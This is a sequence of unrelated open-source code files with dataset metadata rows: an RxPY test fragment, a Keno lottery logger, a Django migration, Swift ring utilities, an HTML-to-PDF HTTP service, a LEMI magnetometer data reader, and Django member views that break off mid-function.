rx.ObservableEmitter """ emitter.setDisposable(rx.ActionDisposable(lambda: sys.stdout.write("disposed"))) for i in xrange(1, 30): log.debug("emit %s" % i) emitter.onNext(i) time.sleep(1) emitter.onComplete() log.info("hello") log.debug("main process is %s\n" % multiprocessing.current_process().pid) o = rx.Observable.create(emit).observeOn(multiprocessing.Process) d = o \ .doOnNext(lambda x: log.debug("doonnext=%s" % x)).map(lambda x: x * 10) \ .blockingSubscribe(on_next=lambda x: log.debug("subscribe x=%s" % x), on_error=lambda e: log.error("onerror!!!!1111111")) print "d=", d # def test_subscribeOn(self): # def emit(emitter): # """ # # :type emitter: rexpython.Emitter # """ # for i in xrange(1, 40): # log.debug("emit %s" % i) # emitter.onNext(i) # time.sleep(1) # # o = rx.Observable.create(emit).doOnNext(lambda x: log.debug("doonnext=%s" % x)) # d = o.subscribeOn(multiprocessing.Process).subscribe( # rx.LambdaObserver(on_next=lambda x: log.debug("subscribe x=%s" % x))) # print "d=", d
mit
3,438,136,467,915,082,000
33.65
97
0.481241
false
AYJAYY/KenoDB
keno.py
1
4245
# Keno Data Logging - QuickKeno
# KDL v1.5.2 - Python 3 Conversion
# Last Edit Date: 1/9/2021
from urllib.request import urlopen
import json
import time


def write_file(file_name, write_mode, file_text):
    text_file = open(file_name, write_mode)
    text_file.write(file_text)
    text_file.close()

#get the keno json file
ma_keno_json = urlopen("http://www.masslottery.com/data/json/search/dailygames/todays/15.json")
#read from the json file
json_string = ma_keno_json.read()
#parse the json file so we can work with it
parsed_json = json.loads(json_string)
#get the min and max game and subtract them...
#...so we can get total number of games to iterate over
min_game = int(parsed_json['min'])
max_game = int(parsed_json['max'])
games = max_game - min_game

#script loop
while games > 0:
    #get info from "draws" section in json file + create error log
    orgOrder = parsed_json['draws'][games]['winning_num_org']
    sortedOrder = parsed_json['draws'][games]['winning_num']
    multiplier = parsed_json['draws'][games]['bonus']
    multi_int = parsed_json['draws'][games]['bonus_value']
    draw = parsed_json['draws'][games]['draw_id']
    #split on dashes 19 times to split up the 20 numbers
    orgOrder_split = orgOrder.split('-', 19)
    #join the 20 numbers with commas to accommodate the csv
    orgOrder_join = ",".join(orgOrder_split)
    orgOrder_column = "\n".join(orgOrder_split)
    #a way to string together the data using my "write file" function, this
    #also turns everything into a string format so I can concatenate them.
    long_text = str(orgOrder_join + "," + orgOrder + "," + sortedOrder + "," + multiplier + "," + multi_int + "," + draw) + "\n"
    #also put the numbers in a single column for the alternate file
    single_row = str(orgOrder_column + "\n")
    #write out to the files individually
    try:
        #format today's date for the filename and set it
        date = time.strftime("%Y-%m-%d")
        kenodbfile = "KenoFiles/Daily/kenodb" + str(date) + ".csv"
        #write a new daily file
        write_file(kenodbfile, "a+", long_text)
        #append to the master file
        write_file("KenoFiles/kenodbfull.csv", "a+", long_text)
        #append to the single column file
        write_file("KenoFiles/kenodbfull-1column.csv", "a+", single_row)
        #in case the user is running on demand, give success messages & log them
        print("Successfully logged game #" + draw)
        vlog_string = "<font size='1px'><strong>Successfully logged game:</strong> " + draw + " <strong>|</strong> </font>" + "\n"
        sys_log = "KenoFiles/SYSLOG.html"
        write_file(sys_log,"a+",vlog_string)
    except Exception as eW:
        error_date_eW = time.strftime("%Y-%m-%d-%I:%M %p")
        error_text_eW = str(eW) + " | " + "File Write Error" + " | " + error_date_eW + "<br />" + "\n"
        sys_log = "KenoFiles/SYSLOG.html"
        log_html = "KenoFiles/LOG.html"
        html_text = """<button type="button" class="btn btn-danger">An error has occurred while writing to one of the files. Check the log in /KenoFiles</button><br />""" + "\n"
        write_file(sys_log,"a+",error_text_eW)
        write_file(log_html,"a+",html_text)
        print("An error has occurred while writing to one of the files. Check the logs in /KenoFiles")
        break
    games = games - 1

#success - write to logs and print out in case this is an on demand run
games = max_game - min_game
success_date = time.strftime("%Y-%m-%d-%I:%M %p")
log_html = "KenoFiles/LOG.html"
sys_log = "KenoFiles/SYSLOG.html"
success_html = "<center><div class='bg-success' style='border:1px solid green;'><strong><font color='green'> KenoDB completed successfully" + " | " + success_date + " | Min Game: " + str(min_game) + " | Max Game: " + str(max_game) + " | Total Games: " + str(games) + "</font></strong></div></center><br />" + "\n"
sys_success_html = """<button type="button" class="btn btn-success">KenoDB completed successfully""" + " | Date: " + success_date + " | Min Game: " + str(min_game) + " | Max Game: " + str(max_game) + " | Number Of Games: " + str(games) + "</button><br />" + "\n"
write_file(log_html,"a+",sys_success_html)
write_file(sys_log,"a+",success_html)
print("KenoDB completed successfully")
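A quick illustration of the split/join step above, as an editor's sketch (not part of keno.py); the draw string is made up for demonstration:

# Illustrative sketch: how the dash-separated draw string is reshaped
# for the CSV row and for the one-number-per-line column file.
orgOrder = "5-12-23-34-45"                 # hypothetical draw string
orgOrder_split = orgOrder.split('-', 19)   # ['5', '12', '23', '34', '45']
print(",".join(orgOrder_split))            # 5,12,23,34,45  -> one CSV row
print("\n".join(orgOrder_split))           # one number per line -> column file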
gpl-3.0
8,259,616,565,052,512,000
47.793103
313
0.643816
false
nephila/djangocms-blog
djangocms_blog/liveblog/migrations/0001_initial.py
1
2058
import django.db.models.deletion import filer.fields.image from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ("cms", "0013_urlconfrevision"), ("filer", "0003_thumbnailoption"), ] operations = [ migrations.CreateModel( name="Liveblog", fields=[ ( "cmsplugin_ptr", models.OneToOneField( parent_link=True, auto_created=True, primary_key=True, serialize=False, to="cms.CMSPlugin", on_delete=django.db.models.deletion.CASCADE, ), ), ("body", models.TextField(verbose_name="body")), ("publish", models.BooleanField(default=False, verbose_name="publish liveblog entry")), ( "image", filer.fields.image.FilerImageField( related_name="djangocms_blog_liveblog_image", on_delete=django.db.models.deletion.SET_NULL, verbose_name="image", blank=True, to="filer.Image", null=True, ), ), ( "thumbnail", models.ForeignKey( related_name="djangocms_blog_liveblog_thumbnail", on_delete=django.db.models.deletion.SET_NULL, verbose_name="thumbnail size", blank=True, to="filer.ThumbnailOption", null=True, ), ), ], options={ "verbose_name": "liveblog entry", "verbose_name_plural": "liveblog entries", }, bases=("cms.cmsplugin",), ), ]
bsd-3-clause
3,167,827,842,490,844,700
33.881356
103
0.420797
false
Mirantis/swift-encrypt
swift/common/ring/utils.py
1
2880
from collections import defaultdict def tiers_for_dev(dev): """ Returns a tuple of tiers for a given device in ascending order by length. :returns: tuple of tiers """ t1 = dev['zone'] t2 = "{ip}:{port}".format(ip=dev.get('ip'), port=dev.get('port')) t3 = dev['id'] return ((t1,), (t1, t2), (t1, t2, t3)) def build_tier_tree(devices): """ Construct the tier tree from the zone layout. The tier tree is a dictionary that maps tiers to their child tiers. A synthetic root node of () is generated so that there's one tree, not a forest. Example: zone 1 -+---- 192.168.1.1:6000 -+---- device id 0 | | | +---- device id 1 | | | +---- device id 2 | +---- 192.168.1.2:6000 -+---- device id 3 | +---- device id 4 | +---- device id 5 zone 2 -+---- 192.168.2.1:6000 -+---- device id 6 | | | +---- device id 7 | | | +---- device id 8 | +---- 192.168.2.2:6000 -+---- device id 9 | +---- device id 10 | +---- device id 11 The tier tree would look like: { (): [(1,), (2,)], (1,): [(1, 192.168.1.1:6000), (1, 192.168.1.2:6000)], (2,): [(2, 192.168.2.1:6000), (2, 192.168.2.2:6000)], (1, 192.168.1.1:6000): [(1, 192.168.1.1:6000, 0), (1, 192.168.1.1:6000, 1), (1, 192.168.1.1:6000, 2)], (1, 192.168.1.2:6000): [(1, 192.168.1.2:6000, 3), (1, 192.168.1.2:6000, 4), (1, 192.168.1.2:6000, 5)], (2, 192.168.2.1:6000): [(2, 192.168.2.1:6000, 6), (2, 192.168.2.1:6000, 7), (2, 192.168.2.1:6000, 8)], (2, 192.168.2.2:6000): [(2, 192.168.2.2:6000, 9), (2, 192.168.2.2:6000, 10), (2, 192.168.2.2:6000, 11)], } :devices: device dicts from which to generate the tree :returns: tier tree """ tier2children = defaultdict(set) for dev in devices: for tier in tiers_for_dev(dev): if len(tier) > 1: tier2children[tier[0:-1]].add(tier) else: tier2children[()].add(tier) return tier2children
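A short usage sketch (not part of utils.py) showing the tree described in the docstring; the device dicts are invented for demonstration and fill in only the keys that tiers_for_dev reads:

# Illustrative usage: two devices in the same zone on different servers.
devs = [
    {'id': 0, 'zone': 1, 'ip': '192.168.1.1', 'port': 6000},
    {'id': 1, 'zone': 1, 'ip': '192.168.1.2', 'port': 6000},
]
tree = build_tier_tree(devs)
# tree[()]   -> {(1,)}
# tree[(1,)] -> {(1, '192.168.1.1:6000'), (1, '192.168.1.2:6000')}
# tree[(1, '192.168.1.1:6000')] -> {(1, '192.168.1.1:6000', 0)}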
apache-2.0
-1,470,004,698,661,708,500
31.359551
71
0.365625
false
mwillmott/techbikers
server/wsgi.py
1
1435
""" WSGI config for techbikers project. This module contains the WSGI application used by Django's development server and any production WSGI deployments. It should expose a module-level variable named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover this application via the ``WSGI_APPLICATION`` setting. Usually you will have the standard Django WSGI application here, but it also might make sense to replace the whole Django WSGI application with a custom one that later delegates to the Django one. For example, you could introduce WSGI middleware here, or combine a Django application with an application of another framework. """ import os # We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks # if running multiple sites in the same mod_wsgi process. To fix this, use # mod_wsgi daemon mode with each site in its own daemon process, or use # os.environ["DJANGO_SETTINGS_MODULE"] = "techbikers.settings" os.environ.setdefault("DJANGO_SETTINGS_MODULE", "server.settings.production") # This application object is used by any WSGI server configured to use this # file. This includes Django's development server, if the WSGI_APPLICATION # setting points here. from django.core.wsgi import get_wsgi_application application = get_wsgi_application() # Apply Sentry middleware. from raven.contrib.django.raven_compat.middleware.wsgi import Sentry application = Sentry(application)
mit
2,688,136,823,440,740,400
43.84375
79
0.794425
false
geomagpy/magpy
magpy/lib/format_lemi.py
1
19241
'''
Path:                   magpy.lib.format_lemi
Part of package:        stream (read/write)
Type:                   Input filter, part of read library

PURPOSE:
        Auxiliary input filter for Lemi data.

CONTAINS:
        isLEMIBIN:      (Func) Checks if file is LEMI format binary file.
        readLEMIBIN:    (Func) Reads current LEMI data format binary files.
        isLEMIBIN1:     (Func) Checks if file is LEMI format data file.
        readLEMIBIN1:   (Func) Reads outdated LEMI data format binary files.
        isLEMIHF:       (Func) Checks if file is LEMI format data file.
        readLEMIHF:     (Func) Reads outdated LEMI data format text files.

DEPENDENCIES:
        None.

CALLED BY:
        magpy.lib.magpy_formats
'''
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import absolute_import
from __future__ import division
from io import open

from magpy.stream import *


def h2d(x):
    '''
    Hexadecimal to decimal (for format LEMIBIN2)
    Because the binary for dates is in binary-decimal, not just binary.
    '''
    y = int(x/16)*10 + x%16
    return y


def isLEMIHF(filename):
    '''
    Checks whether a file is ASCII Lemi txt file format.
    '''
    try:
        temp = open(filename, 'rt').readline()
    except:
        return False
    try:
        elem = temp.split()
        if len(elem) == 13:
            try:
                testtime = datetime.strptime(elem[0]+'-'+elem[1]+'-'+elem[2],'%Y-%m-%d')
            except:
                return False
        else:
            return False
    except:
        return False
    #loggerlib.info("format_lemi: Found Lemi 10Hz ascii file %s." % filename)
    return True


def isLEMIBIN1(filename):
    '''
    Checks whether a file is Binary Lemi file format.
    '''
    try:
        temp = open(filename, 'rb').read(32)
        data = struct.unpack('<4cb6B11Bcbbhhhb', temp)
    except:
        return False
    try:
        if not data[0].decode('ascii') == 'L':
            return False
        if not data[22].decode('ascii') in (['A','P']):
            return False
    except:
        return False
    #loggerlib.info("format_lemi: Found Lemi 10Hz binary file %s." % filename)
    return True


def isLEMIBIN(filename):
    '''
    Checks whether a file is Binary Lemi025 file format.
    (2nd format. Used at Conrad Observatory.)
    '''
    try:
        temp = open(filename, 'rb').read(169)
        if temp[:20].decode('ascii').startswith("LemiBin"):
            return True
        else:
            data = struct.unpack('<4cb6B8hb30f3BcB6hL', temp)
    except:
        return False
    try:
        if not data[0].decode('ascii') == 'L':
            return False
        if not data[53].decode('ascii') in (['A','P']):
            return False
    except:
        return False
    print("Reading a Lemi Binary format")
    #loggerlib.info("format_lemi: Found Lemi 10Hz binary file %s." % filename)
    return True


def readLEMIHF(filename, headonly=False, **kwargs):
    '''
    Reading IAGA2002 LEMI format data.
''' starttime = kwargs.get('starttime') endtime = kwargs.get('endtime') getfile = True fh = open(filename, 'rt') # read file and split text into channels stream = DataStream() array = [[] for key in KEYLIST] # Check whether header information is already present headers = {} data = [] key = None xpos = KEYLIST.index('x') ypos = KEYLIST.index('y') zpos = KEYLIST.index('z') t1pos = KEYLIST.index('t1') t2pos = KEYLIST.index('t2') var2pos = KEYLIST.index('var2') var3pos = KEYLIST.index('var3') # get day from filename (platform independent) # -------------------------------------- splitpath = os.path.split(filename) tmpdaystring = splitpath[1].split('.')[0] daystring = re.findall(r'\d+',tmpdaystring)[0] if len(daystring) > 8: daystring = daystring[:8] try: day = datetime.strftime(datetime.strptime(daystring, '%Y%m%d'),'%Y-%m-%d') # Select only files within eventually defined time range if starttime: if not datetime.strptime(day,'%Y-%m-%d') >= datetime.strptime(datetime.strftime(stream._testtime(starttime),'%Y-%m-%d'),'%Y-%m-%d'): getfile = False if endtime: if not datetime.strptime(day,'%Y-%m-%d') <= datetime.strptime(datetime.strftime(stream._testtime(endtime),'%Y-%m-%d'),'%Y-%m-%d'): getfile = False except: loggerlib.warning("readLEMIHF: Wrong dateformat in Filename %s." % filename) pass if getfile: loggerlib.info('readLEMIHF: Reading %s...' % (filename)) for line in fh: if line.isspace(): # blank line continue elif headonly: # skip data for option headonly continue else: #row = LineStruct() elem = line.split() tim = date2num(datetime.strptime(elem[0]+'-'+elem[1]+'-'+elem[2]+'T'+elem[3]+':'+elem[4]+':'+elem[5],'%Y-%m-%dT%H:%M:%S.%f')) #row.time = tim array[0].append(tim) array[xpos].append(float(elem[6])) array[ypos].append(float(elem[7])) array[zpos].append(float(elem[8])) if len(elem) > 8: try: array[t1pos].append(float(elem[9])) array[t2pos].append(float(elem[10])) array[var2pos].append(float(elem[11])) array[var3pos].append(float(elem[12])) except: pass headers['col-x'] = 'x' headers['unit-col-x'] = 'nT' headers['col-y'] = 'y' headers['unit-col-y'] = 'nT' headers['col-z'] = 'z' headers['unit-col-z'] = 'nT' if len(elem) > 8: headers['col-t1'] = 'Tsens' headers['unit-col-t1'] = 'C' headers['col-t2'] = 'Tel' headers['unit-col-t2'] = 'C' headers['col-var2'] = 'VCC' headers['unit-col-var2'] = 'V' headers['col-var3'] = 'Index' headers['unit-col-var3'] = '' else: headers = stream.header stream =[] fh.close() for idx,ar in enumerate(array): if len(ar) > 0: array[idx] = np.asarray(array[idx]) headers['DataFormat'] = 'Lviv-LEMI-Buffer' return DataStream([LineStruct()], headers, np.asarray(array).astype(object)) def readLEMIBIN(filename, headonly=False, **kwargs): ''' Function for reading current data format of LEMI data. KWARGS: tenHz: (bool) to use 10Hz data timeshift: (float) providing a time shift, which is added to PC time column (usually NTP) COMPLETE DATA STRUCTURE:'<4cb6B8hb30f3BcBcc5hL' --TAG: data[0:4] # L025 --TIME (LEMI): 2000+h2d(data[5]),h2d(data[6]),h2d(data[7]),h2d(data[8]),h2d(data[9]),h2d(data[10]) --T (sensor): data[11]/100. --T (electr.): data[12]/100. --BIAS: data[13],data[14],data[15] --BIAS FIELD: data[16]/400.,data[17]/400.,data[18]/400. --(EMPTY) data[19] --DATA1: data[20]*1000.,data[21]*1000.,data[22]*1000. --DATA2: data[23]*1000.,data[24]*1000.,data[25]*1000. --DATA3: data[26]*1000.,data[27]*1000.,data[28]*1000. --DATA4: data[29]*1000.,data[30]*1000.,data[31]*1000. --DATA5: data[32]*1000.,data[33]*1000.,data[34]*1000. --DATA6: data[35]*1000.,data[36]*1000.,data[37]*1000. 
--DATA7: data[38]*1000.,data[39]*1000.,data[40]*1000. --DATA8: data[41]*1000.,data[42]*1000.,data[43]*1000. --DATA9: data[44]*1000.,data[45]*1000.,data[46]*1000. --DATA10: data[47]*1000.,data[48]*1000.,data[49]*1000. --MODE: data[50] # Mode: 1, 2 or 3 --FLASH % FREE: data[51] --BATTERY (V): data[52] --GPS STATUS: data[53] # A (active) or P (passive) --(EMPTY) data[54] --TIME (PC): 2000+data[55],data[56],data[57],data[58],data[59],data[60],data[61] ''' # Reading Lemi025 Binary format data. starttime = kwargs.get('starttime') endtime = kwargs.get('endtime') debug = kwargs.get('debug') getfile = True timeshift = kwargs.get('timeshift') gpstime = kwargs.get('gpstime') sectime = kwargs.get('sectime') #print "Reading LEMIBIN -- careful --- check time shifts and used time column (used during acquisition and read????)" timediff = [] ## Moved the following into acquisition if not timeshift: timeshift = 0.0 # milliseconds and time delay (PC-GPS) are already considered in acquisition if not gpstime: gpstime = False # if true then PC time will be saved to the sectime column and gps time will occupy the time column # Check whether its the new (with ntp time) or old (without ntp) format temp = open(filename, 'rb').read(169) if temp[:60].decode('ascii').startswith("LemiBin"): # current format sensorid = temp[:60].split()[1] sensorid = sensorid.decode('ascii') dataheader = True lemiformat = "current" packcode = '<4cb6B8hb30f3BcB6hL' linelength = 169 stime = True if debug: print ("SensorID", sensorid) else: # old format data = struct.unpack('<4cb6B8hb30f3BcBcc5hL', temp) if data[55] == 'L': dataheader = False lemiformat = "out-dated" packcode = '<4cb6B8hb30f3BcB' linelength = 153 stime = False elif data[0] == 'L' and data[55] != 'L': dataheader = False lemiformat = "current (without header)" packcode = '<4cb6B8hb30f3BcB6hL' linelength = 169 stime = True else: loggerlib.error("readLEMIBIN: Something, somewhere, went very wrong.") fh = open(filename, 'rb') stream = DataStream([],{}) array = [[] for key in KEYLIST] data = [] key = None theday = extractDateFromString(filename) try: if starttime: if not theday[-1] >= datetime.date(stream._testtime(starttime)): getfile = False if endtime: if not theday[0] <= datetime.date(stream._testtime(endtime)): getfile = False except: getfile = True if getfile: loggerlib.info("read: %s Format: Binary LEMI format (%s)." % (filename,lemiformat)) if dataheader == True: junkheader = fh.readline() stream.header['SensorID'] = sensorid loggerlib.info('readLEMIBIN: Reading %s...' % (filename)) stream.header['col-x'] = 'x' stream.header['unit-col-x'] = 'nT' stream.header['col-y'] = 'y' stream.header['unit-col-y'] = 'nT' stream.header['col-z'] = 'z' stream.header['unit-col-z'] = 'nT' stream.header['col-t1'] = 'Ts' stream.header['unit-col-t1'] = 'deg' stream.header['col-t2'] = 'Te' stream.header['unit-col-t2'] = 'deg' stream.header['col-var2'] = 'Voltage' stream.header['unit-col-var2'] = 'V' stream.header['col-str1'] = 'GPS-Status' timediff = [] line = fh.read(linelength) while len(line) > 0: try: data= struct.unpack(str(packcode),line) except Exception as e: loggerlib.warning('readLEMIBIN: Error reading data. There is probably a broken line.') loggerlib.warning('readLEMIBIN: Error string: "%s"' % e) loggerlib.warning('readLEMIBIN: Aborting data read.') line = '' bfx = data[16]/400. bfy = data[17]/400. bfz = data[18]/400. 
            stream.header['DataCompensationX'] = bfx
            stream.header['DataCompensationY'] = bfy
            stream.header['DataCompensationZ'] = bfz

            # get GPSstate
            gpsstate = data[53]

            #if gpsstate == 'A':
            #if not sectime:
            if not gpsstate == 'P' or not sectime:  # Verify these conditions - particularly when comparing bufferfile and mqtt transmission time
                time = datetime(2000+h2d(data[5]),h2d(data[6]),h2d(data[7]),h2d(data[8]),h2d(data[9]),h2d(data[10])) # Lemi GPS time
                sectime = datetime(2000+data[55],data[56],data[57],data[58],data[59],data[60],data[61])+timedelta(microseconds=timeshift*1000.) # PC time
                timediff.append((date2num(time)-date2num(sectime))*24.*3600.) # in seconds
            else:
                try:
                    time = datetime(2000+data[55],data[56],data[57],data[58],data[59],data[60],data[61])+timedelta(microseconds=timeshift*1000.) # PC time
                except:
                    loggerlib.error("readLEMIBIN: Error reading line. Aborting read. (See docs.)")
                try:
                    sectime = datetime(2000+h2d(data[5]),h2d(data[6]),h2d(data[7]),h2d(data[8]),h2d(data[9]),h2d(data[10])) # Lemi GPS time
                    timediff.append((date2num(time)-date2num(sectime))*24.*3600.) # in seconds
                except:
                    loggerlib.warning("readLEMIBIN: Could not read secondary time column.")

            #--------------------TODO--------------------------------------------
            # This is usually an error that comes about during an interruption of data writing
            # that leads to only a partial line being written. Normal data usually follows if the
            # data logger starts up again within the same day.
            # ---> It can be remedied using an iterative search for the next appearing "L025" tag
            # in the binary data. See magpy/acquisition/lemiprotocol.py for an example of this
            # iterative search.
            #--------------------------------------------------------------------

            xpos = KEYLIST.index('x')
            ypos = KEYLIST.index('y')
            zpos = KEYLIST.index('z')
            t1pos = KEYLIST.index('t1')
            t2pos = KEYLIST.index('t2')
            var2pos = KEYLIST.index('var2')
            str1pos = KEYLIST.index('str1')
            secpos = KEYLIST.index('sectime')

            for i in range(10):
                tim = date2num(time+timedelta(microseconds=(100000.*i)))
                array[0].append(tim)
                array[xpos].append((data[20+i*3])*1000.)
                array[ypos].append((data[21+i*3])*1000.)
                array[zpos].append((data[22+i*3])*1000.)
                array[t1pos].append(data[11]/100.)
                array[t2pos].append(data[12]/100.)
                array[var2pos].append(data[52]/10.)
                array[str1pos].append(data[53])
                sectim = date2num(sectime+timedelta(microseconds=(100000.*i)))
                array[secpos].append(sectim)

            line = fh.read(linelength)

    fh.close()

    gpstime = True
    if gpstime and len(timediff) > 0:
        loggerlib.info("readLEMIBIN2: Time difference (in sec) between GPS and PC (GPS-PC): %f sec +- %f" % (np.mean(timediff), np.std(timediff)))
        print("Time difference between GPS and PC (GPS-PC):", np.mean(timediff), np.std(timediff))
    if sectime:
        print("contains secondary time column with NTP time")

    for idx,ar in enumerate(array):
        if len(ar) > 0:
            array[idx] = np.asarray(array[idx]).astype(object)

    stream.header['DataFormat'] = 'Lviv-LEMI'

    return DataStream([LineStruct()], stream.header, np.asarray(array))


def readLEMIBIN1(filename, headonly=False, **kwargs):
    '''
    Function for reading LEMI format data.
    NOTE: This function reads an outdated data format.
    Timeshift of ~0.3 seconds must be accounted for.
    (This timeshift is corrected for in current acquisition.lemiprotocol.)
    '''
    starttime = kwargs.get('starttime')
    endtime = kwargs.get('endtime')
    debug = kwargs.get('debug')
    getfile = True

    fh = open(filename, 'rb')
    # read file and split text into channels
    stream = DataStream()
    array = [[] for key in KEYLIST]
    # Check whether header information is already present
    headers = {}
    data = []
    key = None

    theday = extractDateFromString(filename)
    try:
        if starttime:
            if not theday[-1] >= datetime.date(stream._testtime(starttime)):
                getfile = False
        if endtime:
            if not theday[0] <= datetime.date(stream._testtime(endtime)):
                getfile = False
    except:
        # Date format not recognized. Need to read all files
        getfile = True

    if getfile:
        loggerlib.info('readLEMIBIN1: Reading %s' % (filename))

        headers['col-x'] = 'x'
        headers['unit-col-x'] = 'nT'
        headers['col-y'] = 'y'
        headers['unit-col-y'] = 'nT'
        headers['col-z'] = 'z'
        headers['unit-col-z'] = 'nT'

        xpos = KEYLIST.index('x')
        ypos = KEYLIST.index('y')
        zpos = KEYLIST.index('z')
        t1pos = KEYLIST.index('t1')
        t2pos = KEYLIST.index('t2')

        line = fh.read(32)
        #print (line, len(line))
        while len(line) > 0:
            data = struct.unpack("<4cb6B11Bcbbhhhb", line)
            data = [el.decode('ascii') if isinstance(el, basestring) else el for el in data]
            bfx = data[-4]/400.
            bfy = data[-3]/400.
            bfz = data[-2]/400.
            headers['DataCompensationX'] = bfx
            headers['DataCompensationY'] = bfy
            headers['DataCompensationZ'] = bfz
            headers['SensorID'] = line[0:4].decode('ascii')
            newtime = []
            for i in range (5,11):
                newtime.append(h2d(data[i]))
            currsec = newtime[-1]
            newtime.append(0.0)
            for i in range (0,30):
                row = LineStruct()
                line = fh.read(16)
                data = struct.unpack('<3f2h', line)
                microsec = i/10.
                if microsec >= 2:
                    secadd = 2.
                elif microsec >= 1:
                    secadd = 1.
                else:
                    secadd = 0.
                newtime[-1] = microsec-secadd
                newtime[-2] = currsec+secadd
                time = datetime(2000+newtime[0],newtime[1],newtime[2],newtime[3],newtime[4],int(newtime[5]),int(newtime[6]*1000000))
                array[0].append(date2num(time))
                array[xpos].append((data[0])*1000.)
                array[ypos].append((data[1])*1000.)
                array[zpos].append((data[2])*1000.)
                array[t1pos].append(data[3]/100.)
                array[t2pos].append(data[4]/100.)
            line = fh.read(32)

    fh.close()
    #print "Finished file reading of %s" % filename

    for idx,ar in enumerate(array):
        if len(ar) > 0:
            array[idx] = np.asarray(array[idx]).astype(object)

    headers['DataFormat'] = 'Lviv-LEMI-old'

    return DataStream([LineStruct()], headers, np.asarray(array))
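An editor's sketch (not part of format_lemi.py) making the binary layout above concrete: it shows what h2d does with a binary-coded-decimal byte and confirms the record lengths implied by the packcodes used in the readers.

# Illustrative sketch: BCD decoding and record sizes.
import struct
# 0x25 == 37; h2d keeps the two hex digits as decimal digits 2 and 5:
assert (int(0x25/16)*10 + 0x25 % 16) == 25
# The packcodes match the 169-byte and 32-byte reads above:
assert struct.calcsize('<4cb6B8hb30f3BcB6hL') == 169
assert struct.calcsize('<4cb6B11Bcbbhhhb') == 32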
bsd-3-clause
-1,418,573,490,651,415,800
35.235405
177
0.54467
false
murdej/h2pws
h2pws.py
1
2618
import time import BaseHTTPServer from urlparse import urlparse, parse_qs import subprocess import base64 import qrcode import qrcode.image.svg import cStringIO #1630-1800 HOST_NAME = 'localhost' # !!!REMEMBER TO CHANGE THIS!!! PORT_NUMBER = 8000 # Maybe set this to 9000. class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_HEAD(s): s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() def do_GET(s): """Respond to a GET request.""" s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write("<html><head><title></title></head>") s.wfile.write("<body><p>Send html source by POST.</p>") # s.wfile.write("<p>You accessed path: %s</p>" % s.path) s.wfile.write("</body></html>") def do_POST(s): """Respond to a POST request.""" s.send_response(200) s.send_header("Content-type", "application/x-pdf") s.end_headers() # params url_params = parse_qs(urlparse(s.path).query) args = ["wkhtmltopdf"] for n in [ 'orientation', 'page-size', 'margin-bottom', 'margin-left', 'margin-right', 'margin-top' ]: if n in url_params: args += [ '--' + n, url_params[n][0] ] args += ["-", "-"] print args html = s.rfile.read(int(s.headers.getheader('content-length'))) # Replace "qr::xxxxxxxxxxxxxxxxx" to sql qr code if "qr-to-svg" in url_params : new_html = '' pos = 0 while True: begin_str = '"qr::' pos_a = html.find(begin_str, pos) if pos_a == -1: break # copy text before new_html += html[pos:pos_a] # extract src of QR code pos_a += len(begin_str) pos_b = html.find('"', pos_a + 1) qr_src = html[pos_a:pos_b] print "qr:src='" + qr_src + "'" # new_html += '[[' + qr_src + ']]' factory = qrcode.image.svg.SvgPathImage img = qrcode.make(qr_src, image_factory=factory) output = cStringIO.StringIO() img.save(output) svgb = 'data:image/svg+xml;base64,' + base64.b64encode(output.getvalue()) output.close() new_html += svgb pos = pos_b new_html += html[pos:] html = new_html p = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE) p.stdin.write(html) p.stdin.close() s.wfile.write(p.stdout.read()) p.wait() if __name__ == '__main__': server_class = BaseHTTPServer.HTTPServer httpd = server_class((HOST_NAME, PORT_NUMBER), MyHandler) print time.asctime(), "Server Starts - %s:%s" % (HOST_NAME, PORT_NUMBER) try: httpd.serve_forever() except KeyboardInterrupt: pass httpd.server_close() print time.asctime(), "Server Stops - %s:%s" % (HOST_NAME, PORT_NUMBER)
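A hypothetical client sketch (not part of h2pws.py): posting HTML to the service and saving the returned PDF. It uses the requests library purely for demonstration; the host, port, and query parameters follow the defaults and names defined above, and the "qr::" marker exercises the SVG replacement branch.

# Illustrative client for the server above.
import requests

html = '<html><body><h1>Invoice</h1><img src="qr::hello-world"/></body></html>'
resp = requests.post(
    "http://localhost:8000/?orientation=Landscape&page-size=A4&qr-to-svg=1",
    data=html,
)
with open("out.pdf", "wb") as f:
    f.write(resp.content)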
gpl-2.0
4,676,818,734,918,425,000
26
104
0.637128
false
texib/bitcoin-zoo
member/views.py
1
3349
from django.shortcuts import render
from django.contrib.auth.models import User, Group
from django.contrib.auth import login
from django.contrib.auth import logout
from django.contrib.auth import authenticate
from django.http import HttpResponseRedirect

from rest_framework import viewsets
from rest_framework.authentication import SessionAuthentication, BasicAuthentication
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.views import APIView
from serializer import UserSerializer, GroupSerializer
from rest_framework import status
from rest_framework import parsers
from rest_framework import renderers

from rest_framework_jwt import utils
from rest_framework_jwt.authentication import JSONWebTokenAuthentication as jwt_auth
from rest_framework_jwt.serializers import JSONWebTokenSerializer

# userena
from userena import views


class UserViewSet(viewsets.ModelViewSet):
    """
    API endpoint that allows users to be viewed or edited.
    """
    authentication_classes = (BasicAuthentication, )
    queryset = User.objects.all()
    serializer_class = UserSerializer


class GroupViewSet(viewsets.ModelViewSet):
    """
    API endpoint that allows groups to be viewed or edited.
    """
    queryset = Group.objects.all()
    serializer_class = GroupSerializer


def signup(request):
    '''
    a simple override of the signup view
    '''
    return views.signup(request, success_url='/home/')


def signout(request):
    '''
    '''
    return views.signout(request, template_name='home.html')


def signin(request):
    '''
    '''
    # this is a little trick to hack the userena signin function
    return views.signin(request, redirect_signin_function=lambda *arg: '/home/')


class testSignin(APIView):
    '''
    API View that receives a POST with a user's username and password.

    Returns a JSON Web Token that can be used for authenticated requests.
    '''
    throttle_classes = ()
    permission_classes = ()
    authentication_classes = ()
    parser_classes = (parsers.FormParser, parsers.JSONParser,)
    renderer_classes = (renderers.JSONRenderer,)
    serializer_class = JSONWebTokenSerializer
    jwt = jwt_auth()

    def post(self, request):
        '''
        a known issue now... a segmentation fault happens if you log in,
        then log out and log in again..
        '''
        serializer = testSignin.serializer_class(data=request.DATA)

        if serializer.is_valid():
            payload = utils.jwt_decode_handler(serializer.object['token'])
            user = self.jwt.authenticate_credentials(payload)

